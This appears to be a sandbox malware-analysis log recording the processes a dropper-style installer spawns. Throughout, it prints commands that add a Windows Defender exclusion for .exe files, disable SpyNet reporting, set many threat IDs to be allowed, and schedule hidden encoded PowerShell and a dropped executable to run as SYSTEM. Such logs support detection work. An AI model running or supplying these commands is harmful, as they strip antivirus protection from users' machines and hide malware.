Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gUpzuvmWb"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gUpzuvmWb"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\" d8 /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe d8 /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gUpzuvmWb"
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gUpzuvmWb"
Source: C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\" d8 /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
